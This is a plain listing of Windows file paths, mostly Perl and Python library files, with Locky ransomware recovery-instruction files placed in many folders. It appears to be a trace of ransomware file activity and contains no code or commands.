c:\Perl\perl\lib\unicore\lib\Nv\3_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\4.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\40.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\400.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\4000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\40000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\41.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\42.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\43.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\44.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\45.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\46.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\47.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\48.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\49.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\4_5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\50.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\500.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\50000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5_6.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\5_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\6.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\60.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\600.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\6000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\60000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\70.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\700.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\70000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\7_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\80.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\800.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\8000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\80000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\9.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\90.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\900.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\9000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\90000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\9_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\NaN.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\_1_2.pl<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OAlpha\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\ODI\N.pl<br />
c:\Perl\perl\lib\unicore\lib\ODI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\ODI\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OGrExt\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OIDC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OIDS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OIDS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OLower\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OLower\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OLower\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OMath\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OMath\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OMath\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\OUpper\N.pl<br />
c:\Perl\perl\lib\unicore\lib\OUpper\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\OUpper\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\N.pl<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\PatSyn\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\PatWS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\PatWS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\PatWS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Alnum.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Perl\Any.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Assigned.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Blank.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Graph.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PerlSpac.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PerlWord.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixAln.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixAlp.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixBla.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixCnt.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixDig.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixGra.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixLow.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixPri.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixPun.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixSpa.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\PosixUpp.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Print.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\SpacePer.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\VertSpac.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\Word.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_XBegin.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_XExtend.pl<br />
c:\Perl\perl\lib\unicore\lib\Perl\_XLVLVTV.pl<br />
c:\Perl\perl\lib\unicore\lib\QMark\N.pl<br />
c:\Perl\perl\lib\unicore\lib\QMark\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\QMark\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Radical\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Radical\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Radical\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\AT.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\SB\CL.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\FO.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\LE.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\LO.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\SC.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\SE.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\Sp.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\ST.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\UP.pl<br />
c:\Perl\perl\lib\unicore\lib\SB\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Arab.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Sc\Armi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Armn.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Avst.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bali.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bamu.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Beng.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bopo.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Bugi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Buhd.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cans.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cari.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cham.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cher.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Copt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cprt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Cyrl.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Deva.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Egyp.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ethi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Geor.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Glag.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Goth.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Grek.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Gujr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Guru.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Han.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hang.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hano.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hebr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Hira.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ital.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Java.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Kana.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Khar.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Khmr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Knda.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Kthi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lana.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lao.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Latn.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lepc.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Limb.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Linb.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lyci.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Lydi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mlym.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mong.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mtei.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Mymr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Nko.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ogam.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Orkh.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Orya.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Osma.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Phag.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Phli.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Phnx.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Prti.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Rjng.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Runr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Samr.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Saur.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Sinh.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Sund.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Sylo.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Syrc.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tagb.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tale.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Talu.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Taml.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tavt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Telu.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tfng.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tglg.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Thaa.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Thai.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Tibt.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Ugar.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Vai.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Xpeo.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Xsux.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Yi.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Zinh.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Zyyy.pl<br />
c:\Perl\perl\lib\unicore\lib\Sc\Zzzz.pl<br />
c:\Perl\perl\lib\unicore\lib\SD\N.pl<br />
c:\Perl\perl\lib\unicore\lib\SD\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\SD\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Space\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Space\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Space\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\STerm\N.pl<br />
c:\Perl\perl\lib\unicore\lib\STerm\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\STerm\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Term\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Term\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Term\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\N.pl<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\UIdeo\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Upper\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Upper\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Upper\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\VS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\VS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\VS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\WB\FO.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\KA.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\LE.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\MB.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\ML.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\MN.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\NL.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\NU.pl<br />
c:\Perl\perl\lib\unicore\lib\WB\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\XIDC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\XIDS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\XIDS\Y.pl<br />
c:\Perl\perl\lib\unicore\Name.pl<br />
c:\Perl\perl\lib\unicore\To\Bmg.pl<br />
c:\Perl\perl\lib\unicore\To\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\To\Digit.pl<br />
c:\Perl\perl\lib\unicore\To\Fold.pl<br />
c:\Perl\perl\lib\unicore\To\Lower.pl<br />
c:\Perl\perl\lib\unicore\To\NFKCCF.pl<br />
c:\Perl\perl\lib\unicore\To\Title.pl<br />
c:\Perl\perl\lib\unicore\To\Upper.pl<br />
c:\Perl\perl\lib\utf8_heavy.pl<br />
c:\Perl\perl\lib\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\validate.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\cdiff.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\Algorithm\diff.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\diffnew.pl<br />
c:\Perl\perl\vendor\lib\Algorithm\htmldiff.pl<br />
c:\Perl\perl\bin\module-version.bat<br />
c:\Perl\perl\bin\_Locky_recover_instructions.txt<br />
c:\Perl\perl\bin\parinstallppd.bat<br />
c:\Perl\perl\bin\perlbug.bat<br />
c:\Perl\perl\bin\perldoc.bat<br />
c:\Perl\perl\bin\perlglob.bat<br />
c:\Perl\perl\bin\perlivp.bat<br />
c:\Perl\perl\bin\perlthanks.bat<br />
c:\Perl\perl\bin\piconv.bat<br />
c:\Perl\perl\bin\pip.bat<br />
c:\Perl\perl\bin\pl2bat.bat<br />
c:\Perl\perl\bin\pl2pm.bat<br />
c:\Perl\perl\bin\pler.bat<br />
c:\Perl\perl\vendor\lib\Crypt\._test.pl<br />
c:\Perl\perl\vendor\lib\Crypt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\DBD\testme.tmp.pl<br />
c:\Perl\perl\vendor\lib\DBD\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\dbixs_rev.pl<br />
c:\Perl\perl\vendor\lib\_Locky_recover_instructions.txt<br />
c:\Perl\perl\bin\pod2html.bat<br />
c:\Perl\perl\bin\pod2latex.bat<br />
c:\Perl\perl\bin\pod2man.bat<br />
c:\Perl\perl\bin\pod2text.bat<br />
c:\Perl\perl\bin\pod2usage.bat<br />
c:\Perl\perl\bin\podchecker.bat<br />
c:\Perl\perl\bin\podselect.bat<br />
c:\Perl\perl\bin\ppd2par.bat<br />
c:\Perl\perl\bin\ppm.bat<br />
c:\Perl\perl\bin\ppm.pl<br />
c:\Perl\perl\bin\prove.bat<br />
c:\Perl\perl\bin\psed.bat<br />
c:\Perl\perl\bin\pstruct.bat<br />
c:\Perl\perl\bin\ptar.bat<br />
c:\Perl\perl\bin\ptardiff.bat<br />
c:\Perl\perl\bin\ptargrep.bat<br />
c:\Perl\perl\bin\pwhich.bat<br />
c:\Perl\perl\bin\runperl.bat<br />
c:\Perl\perl\bin\s2p.bat<br />
c:\Perl\perl\bin\search.bat<br />
c:\Perl\perl\bin\shasum.bat<br />
c:\Perl\perl\bin\SOAPsh.bat<br />
c:\Perl\perl\bin\SOAPsh.pl<br />
c:\Perl\perl\bin\splain.bat<br />
c:\Perl\perl\bin\stubmaker.bat<br />
c:\Perl\perl\bin\stubmaker.pl<br />
c:\Perl\perl\vendor\lib\qd.pl<br />
c:\Perl\perl\vendor\lib\XML\benchmark.pl<br />
c:\Perl\perl\vendor\lib\XML\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\XML\Parser\LWPExternEnt.pl<br />
c:\Perl\perl\vendor\lib\XML\Parser\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\XML\SAX\placeholder.pl<br />
c:\Perl\perl\vendor\lib\XML\SAX\_Locky_recover_instructions.txt<br />
c:\Perl\relocation.pl.bat<br />
c:\Perl\_Locky_recover_instructions.txt<br />
c:\Perl\update_env.pl.bat<br />
c:\Perl\perl\bin\XMLRPCsh.bat<br />
c:\Perl\perl\bin\XMLRPCsh.pl<br />
c:\Perl\perl\bin\xsubpp.bat<br />
c:\Perl\perl\lib\abbrev.pl<br />
c:\Perl\perl\lib\assert.pl<br />
c:\Perl\perl\lib\bigfloat.pl<br />
c:\Perl\perl\lib\bigint.pl<br />
c:\Perl\perl\lib\bigrat.pl<br />
c:\Perl\perl\lib\bytes_heavy.pl<br />
c:\Perl\perl\lib\cacheout.pl<br />
c:\Perl\perl\lib\complete.pl<br />
c:\Perl\perl\lib\Config_git.pl<br />
c:\Perl\perl\lib\Config_heavy.pl<br />
c:\Perl\c\bin\freetype-config.bat<br />
c:\Perl\c\bin\_Locky_recover_instructions.txt<br />
c:\Perl\c\bin\gdlib-config.bat<br />
c:\Perl\c\bin\libpng-config.bat<br />
c:\Perl\c\bin\libpng12-config.bat<br />
c:\Perl\c\bin\mysql_config.bat<br />
c:\AUTOEXEC.BAT<br />
c:\_Locky_recover_instructions.txt<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools\fixinc.sh<br />
c:\Perl\c\libexec\gcc\i686-w64-mingw32\4.4.3\install-tools\_Locky_recover_instructions.txt<br />
c:\Perl\perl\bin\bdf2gdfont.bat<br />
c:\Perl\perl\bin\bdf2gdfont.pl<br />
c:\Perl\perl\bin\c2ph.bat<br />
c:\Perl\perl\bin\config_data.bat<br />
c:\Perl\perl\bin\corelist.bat<br />
c:\Perl\perl\bin\cpan.bat<br />
c:\Perl\perl\bin\cpan2dist.bat<br />
c:\Perl\perl\bin\cpandb.bat<br />
c:\Perl\perl\bin\cpaninject.bat<br />
c:\Perl\perl\bin\cpanp-run-perl.bat<br />
c:\Perl\perl\bin\cpanp.bat<br />
c:\Perl\perl\bin\cpansign.bat<br />
c:\Perl\perl\bin\crc32.bat<br />
c:\Perl\perl\bin\dbilogstrip.bat<br />
c:\Perl\perl\bin\dbiprof.bat<br />
c:\Perl\perl\bin\dbiproxy.bat<br />
c:\Perl\perl\bin\dprofpp.bat<br />
c:\Perl\perl\bin\enc2xs.bat<br />
c:\Perl\perl\bin\exetype.bat<br />
c:\Perl\perl\bin\exe_update.bat<br />
c:\Perl\perl\bin\exe_update.pl<br />
c:\Perl\perl\bin\find2perl.bat<br />
c:\Perl\perl\bin\findrule.bat<br />
c:\Perl\perl\bin\h2ph.bat<br />
c:\Perl\perl\bin\h2xs.bat<br />
c:\Perl\perl\bin\instmodsh.bat<br />
c:\Perl\perl\bin\json_pp.bat<br />
c:\Perl\perl\bin\json_xs.bat<br />
c:\Perl\perl\bin\largeprimes.bat<br />
c:\Perl\perl\bin\libnetcfg.bat<br />
c:\Perl\perl\bin\llw32helper.bat<br />
c:\Perl\perl\bin\llw32helper.pl<br />
c:\Perl\perl\bin\lwp-download.bat<br />
c:\Perl\perl\bin\lwp-dump.bat<br />
c:\Perl\perl\bin\lwp-mirror.bat<br />
c:\Perl\perl\bin\lwp-request.bat<br />
c:\Perl\perl\bin\lwp-rget.bat<br />
c:\Perl\perl\lib\ctime.pl<br />
c:\Perl\perl\lib\dotsh.pl<br />
c:\Perl\perl\lib\dumpvar.pl<br />
c:\Perl\perl\bin\makerandom.bat<br />
c:\Perl\perl\lib\exceptions.pl<br />
c:\Perl\perl\lib\fastcwd.pl<br />
c:\Perl\perl\lib\filter-util.pl<br />
c:\Perl\perl\lib\find.pl<br />
c:\Perl\perl\lib\finddepth.pl<br />
c:\Perl\perl\lib\flush.pl<br />
c:\Perl\perl\lib\getcwd.pl<br />
c:\Perl\perl\lib\getopt.pl<br />
c:\Perl\perl\lib\getopts.pl<br />
c:\Perl\perl\lib\hostname.pl<br />
c:\Perl\perl\lib\importenv.pl<br />
c:\Perl\perl\lib\look.pl<br />
c:\Perl\perl\lib\newgetopt.pl<br />
c:\Perl\perl\lib\open2.pl<br />
c:\Perl\perl\lib\open3.pl<br />
c:\Perl\perl\lib\perl5db.pl<br />
c:\Perl\perl\lib\pwd.pl<br />
c:\Perl\perl\lib\shellwords.pl<br />
c:\Perl\perl\lib\stat.pl<br />
c:\Perl\perl\lib\syslog.pl<br />
c:\Perl\perl\lib\tainted.pl<br />
c:\Perl\perl\lib\termcap.pl<br />
c:\Perl\perl\lib\timelocal.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\af.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ar.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\az.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ca.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\cs.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\cy.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\da.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\de_phone.pl<br />
c:\Python27\Lib\idlelib\idle.bat<br />
c:\Python27\Lib\idlelib\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\185test.db<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\eo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\es.pl<br />
c:\Python27\Lib\test\check_soundcard.vbs<br />
c:\Python27\Lib\test\empty.vbs<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\es_trad.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\et.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fi.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fil.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fo.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\fr.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ha.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\haw.pl<br />
c:\Python27\tcl\tclConfig.sh<br />
c:\Python27\tcl\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\hr.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\hu.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\hy.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ig.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\is.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\ja.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\kk.pl<br />
c:\Perl\perl\lib\Unicode\Collate\Locale\kl.pl<br />
c:\Documents and Settings\User\Cookies\user@bing[2].txt<br />
c:\Documents and Settings\User\Cookies\_Locky_recover_instructions.txt<br />
c:\Documents and Settings\User\Cookies\user@adnxs[1].txt<br />
c:\Documents and Settings\User\Cookies\user@222980912.log.optimizely[1].txt<br />
c:\Documents and Settings\User\Cookies\user@bluekai[1].txt<br />
c:\Python27\tcl\tix8.4.3\pref\WmDefault.txt<br />
c:\Python27\Tools\pynche\html40colors.txt<br />
c:\Python27\Tools\pynche\_Locky_recover_instructions.txt<br />
c:\Python27\Tools\pynche\namedcolors.txt<br />
c:\Python27\Tools\pynche\README.txt<br />
c:\Python27\Tools\pynche\webcolors.txt<br />
c:\Perl\licenses\mingw-w64-crt\README.TXT<br />
c:\Perl\licenses\mingw-w64-crt\_Locky_recover_instructions.txt<br />
c:\Perl\licenses\libfreetype\LICENSE.TXT<br />
c:\Perl\licenses\libfreetype\_Locky_recover_instructions.txt<br />
c:\Python27\Tools\pynche\websafe.txt<br />
c:\Perl\licenses\libfreetype\GPL.TXT<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\sample.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir\sample.txt<br />
c:\Perl\perl\vendor\lib\auto\share\dist\File-ShareDir\subdir\_Locky_recover_instructions.txt<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir\test_file.txt<br />
c:\Perl\perl\vendor\lib\auto\share\module\File-ShareDir\_Locky_recover_instructions.txt<br />
c:\Perl\licenses\libfreetype\FTL.TXT<br />
c:\Perl\licenses\dmake\license.txt<br />
c:\Perl\licenses\dmake\_Locky_recover_instructions.txt<br />
c:\Perl\DISTRIBUTIONS.txt<br />
c:\Python27\Tools\pynche\X\rgb.txt<br />
c:\Python27\Tools\pynche\X\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\ArabicShaping.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\GCBTest.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\auxiliary\GraphemeBreakProperty.txt<br />
